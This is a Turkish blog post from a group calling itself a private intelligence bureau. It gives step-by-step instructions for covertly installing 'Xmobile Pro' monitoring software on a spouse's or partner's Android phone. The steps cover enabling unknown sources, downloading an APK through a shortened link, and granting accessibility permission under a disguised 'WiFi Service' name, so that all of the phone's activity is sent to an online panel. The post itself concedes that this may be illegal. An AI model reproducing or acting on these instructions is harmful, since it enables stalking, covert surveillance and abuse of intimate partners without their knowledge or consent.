7 Haziran 2015 Pazar

TELEFON ÇÖZÜMLERİ : Sevgilinizin veya Karınızın Telefonunu izleyin ! ÜCRETSİZ !!!!

 

ÖZEL BÜRO NOTU : AŞAĞIDAKİ YÖNTEM YASAL OLARAK PROBLEM ÇIKARABİLİR. PEKİ NEDEN PAYLAŞIYORUZ. GRUPLARDA ÇOK SAYIDA EVLİ ÜYEMİZ VAR. BU EVLİ ÜYELERİMİZ MUTLAKA EVLİLİKLERİNDEN DOLAYI MUTLUDUR AMA MAALESEF MUTLU OLMAYANLAR DA VARDIR. ÖZELLİKLE KARISININ YADA KOCASININ KENDİSİNİ ALDATTIĞINI DÜŞÜNEN ÜYELERİMİZ DE VARDIR DİYE TAHMİN EDİYORUZ. BİZ DE İŞTE TAM BU SEBEPLE BU YÖNTEMİ SUNUYORUZ. EĞER KARINIZIN YADA KOCANIZIN SİZİ ALDATTIĞINI DÜŞÜNÜYORSANIZ UYGULAYABİLİRSİNİZ. ANCAK ÖZEL BÜRO GRUBU OLARAK SORUMLULUK KABUL ETMİYORUZ. UYGULAYANLAR SORUMLULUĞU ALMIŞLARDIR DİYE KABUL EDİYORUZ.

 

2 GÜN ÜCRETSİZ FULL SÜRÜM DENEMEK İÇİN AŞAĞIDAKİ GİBİ KURULUM YAPMANIZ YETERLİDİR

Aşağıdaki kurulum adımlarını teker teker uyguladığınızda yaklaşık 1- 2 dakika içerisinde kurulumu kolaylıkla yapabilirsiniz ve üzerine kurulumu yaptığınız telefonu hemen izlemeye başlayabilirsiniz.

Önce aşağıdaki resimlerde olduğu şekilde telefonun ayarlarını yapın. Yapmanız gereken telefonun Ayarlar kısmında yer alan Güvenlik kısmına girip oradaki Bilinmeyen Kaynaklar yazan bölüme tik atmak.



Bu ayarları yaptıktan sonra telefonun internet tarayıcısına http://goo.gl/5h7dDu yazın bu sayfaya gidin, böylece yükleme otomatik olarak başlayacaktır. Yükleme hemen biticek ve aşağıda gösterildiği gibi bir apk dosyası telefona inecektir. O apk dosyasına tıklayın ve kurulumu aşağıdaki resimlerde gösterildiği gibi sırasıyla yapın.





















İlk kez kurulum yapıyorsanız yukarıdaki kısımda I'm new user sekmesini seçin ve aşağıdaki resimlerden kuruluma devam edin, ŞAYET daha önce 1 kez kurulum yaptıysanız ve email ve şifre oluşturduysanız bu adımda ilk seçenek olan I'm already registered user seçeneğini seçip daha önce oluşturduğunuz email ve şifreyi girip devam edin.



Yukarıda bulunan Cihaz modeli kısmına telefon modelınızı yazın (mesela samsung s3, samsung note 2), sonrada en önemlisi doğru bir email adresinizi yazın ve yeni bir şifre oluşturun. ve Register yazan yere tıklayın. Sonra Continue sekmesine tıklayın. Sonrada Tamam a tıklayın ve sonra mutlaka telefonu kapatın ve açın.

Telefonu kapatıp açarak kurulumun 1. Adımını bitirmiş oldunuz Tebrikler.

Şimdi hemen bilgisayarınızdan, yukarıdaki kurulum sırasında belirttiğiniz email adresinize giriş yapın ve emailinize gelmiş olan e postada bulunan yazılım yasal kullanım koşullarının belirtildiği sayfaları aşağıdaki resimlerdeki gösterildiği gibi okuyun ve gösterilen kısımlara tıklayıp onaylayın.

Email onay kısmını mutlaka yapmalısınız emailinizin spam (gereksiz) bölümünede bakın bazı hallerde bu onay emaili spamada gelmiş olabiliyor.

Hemen aşağıda gösterildiği gibi emaildeki Click Here yazan linke tıklayın ve sonrasında da Accept (kabul et) yazan yere tıklayın böylelikle otomatik olarak online kullanıcı panelinize yönlendiriliceksiniz. Artık yönlendirildiğiniz bu kullanıcı panelinize kurulum sırasında belirlediğiniz emaılınız ve şifrenizle giriş yapabilirsiniz.



Evet böylece kurduğunuz yazılımı aktif hale getirmiş ve bu telefonu online panelinize bağlamış oldunuz 2. adımıda böylece bitti.

Son ve en önemli adım olarak ta aşağıdaki ERİŞİM ayarlarını telefona MUTLAKA uygulayın



Ayarlar bölümüne girin Erişebilirlik e tıklayın ve sonrada WiFi Service yazan yere tıklayın ve açık konuma getirip erişime onay verin, daha sonrada aşağıda gösterildiği gibi Tamam a tıklayın



TEBRİKLER TÜM İŞLEMLER BİTTİ

Evet artık yukarıda kurulum sırasında oluşturduğunuz email adresiniz ve şifrenizle Xmobile Pro online kullanıcı panelinize http://goo.gl/lO3Mp5 adresinden giriş yapıp 2 gün boyunca ücretsiz full sürüm olarak Xmobile Pro yu kullanabilirsiniz ve telefondan gelen bilgileri görebilirsiniz. Bu telefon ile yapılan her aktivite dakikalar içinde sizin bu online kullanıcı panelinize düşücektir.

(sistem talep yoğunluğuna göre otomatik olarak bazen 2 gün yerine 1 gün deneme süresi de verebiliyor bilginize)

SAVAŞ KIRÇOVALI

[publicize twitter]

[publicize facebook]

[category teknoloji]

[tags TELEFON ÇÖZÜMLERİ, Sevgili, Karı, Telefon]

Hiç yorum yok:

Yorum Gönder

Hakkımızda

Fotoğrafım
BU BLOG ÖZEL BÜRO GRUBU'NA AİTTİR. RESMİ WEB SİTEMİZ : http://www.ozelburoistihbarat.com

ÖZEL BÜRO İSTİHBARAT GRUBU